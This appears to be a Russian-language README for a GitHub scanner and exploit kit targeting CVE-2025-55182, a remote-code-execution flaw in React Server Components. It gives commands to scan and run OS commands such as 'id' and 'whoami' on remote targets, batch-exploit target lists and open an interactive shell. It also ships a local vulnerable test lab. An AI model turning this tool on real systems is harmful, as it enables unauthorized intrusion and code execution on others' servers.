
Сканер и эксплойт-набор для CVE-2025-55182 — критической RCE-уязвимости без аутентификации в React Server Components. Включает обнаружение, интерактивную оболочку, развёртывание в Docker и обучающий технический анализ.
Комплексный набор инструментов для проверки безопасности CVE-2025-55182 — критической уязвимости удалённого выполнения кода без аутентификации в React Server Components.
Хотите понять эту уязвимость на 100%?
📖 Прочитайте наш полный технический анализ — всё, что вам нужно знать:
- Почему React работает на сервере (а не только в браузере!)
- Как работает атака с наглядными схемами
- Каждая строка эксплойта объяснена
- От базовых понятий до продвинутой эксплуатации
- Никаких предварительных требований!
Идеально подходит для: отчетов по безопасности, учебных материалов, анализа угроз или просто для обучения!
Эта уязвимость затрагивает версии React Server Components с 19.0.0 по 19.2.0, влияя на:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackВоздействие: Неаутентифицированные злоумышленники могут удалённо выполнять произвольный код через небезопасную десериализацию HTTP-запросов к конечным точкам Server Functions.
👉 Прочитайте полный технический анализ — исчерпывающее руководство, охватывающее:
Идеально подходит для:
Предварительные знания не требуются — начинается с основ и переходит к продвинутым техникам эксплуатации!
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ
Этот инструмент предназначен исключительно для:
Предупреждение: Несанкционированный доступ к компьютерным системам незаконен. Пользователи несут ответственность за соблюдение всех применимых законов и нормативных актов. Авторы не несут ответственности за неправомерное использование этого инструмента.
Никаких зависимостей не требуется! Один bash-скрипт для быстрого тестирования.
👉 EXPLOIT_SCRIPT.md — автономный скрипт, который:
# Одна цель
./exploit-cve-2025-55182.sh http://target.com
# Несколько целей
./exploit-cve-2025-55182.sh -f targets.txt
Полный набор инструментов с Docker, веб-интерфейсом и интеграцией Nuclei. Продолжайте чтение ниже для установки.
| Возможность | Описание |
|---|---|
| 🐳 Поддержка Docker | Развертывание одной командой с Docker Compose |
| 🌐 Веб-интерфейс | Удобный веб-интерфейс для нетехнических пользователей |
| 🔍 Уязвимая тестовая среда | Запуск локального уязвимого приложения для безопасного тестирования |
| 🎯 Удалённое сканирование | Проверка внешних целей на уязвимость |
| ⚡ Интерактивная оболочка | Выполнение OS-команд и просмотр результатов в реальном времени |
| 📊 Несколько режимов сканирования | Только обнаружение или полная эксплуатация |
| 📝 Подробные отчёты | Форматы вывода JSON и текст |
| 🔧 Интеграция Nuclei | Использование мощного сканера ProjectDiscovery |
Выберите свой метод установки:
# Клонирование репозитория
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Запуск сканера
docker compose up
# Доступ к веб-интерфейсу по адресу http://localhost:3001
# Клонирование репозитория
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Установка Nuclei (macOS)
brew install nuclei
# Назначение прав на выполнение скриптов
chmod +x scripts/*.sh
📖 Подробная настройка: См. SETUP_GUIDE.md для пошаговых инструкций
⚡ Краткий справочник: См. QUICKSTART.md для типовых сценариев использования
Запуск веб-интерфейса:
docker compose up
# Откройте браузер: http://localhost:3001
Запуск с уязвимым тестовым приложением:
docker compose --profile with-vulnerable-app up
# Сканер: http://localhost:3001
# Уязвимое приложение: http://localhost:3000
Важно для пользователей Docker: При сканировании из Docker используйте:
http://host.docker.internal:3000 для сканирования приложений на вашем основном компьютереhttp://vulnerable-app:3000 для сканирования контейнеризированного уязвимого приложенияhttps://example.com для внешних целейhttp://localhost:3001Создайте и протестируйте локальное уязвимое приложение:
# Терминал 1: Запуск уязвимого приложения
./scripts/setup-vulnerable-app.sh
# Приложение будет работать по адресу http://localhost:3000
# Терминал 2: Проверка
./scripts/test-local.sh
# Выполнение пользовательских команд
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Базовое сканирование
./scripts/test-remote.sh https://target.com
# С выполнением команды
./scripts/test-remote.sh https://target.com "id"
# Создание файла с целями
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Сканирование всех целей
./scripts/test-multiple.sh targets.txt
Базовое обнаружение уязвимости:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
Выполнение пользовательских команд:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v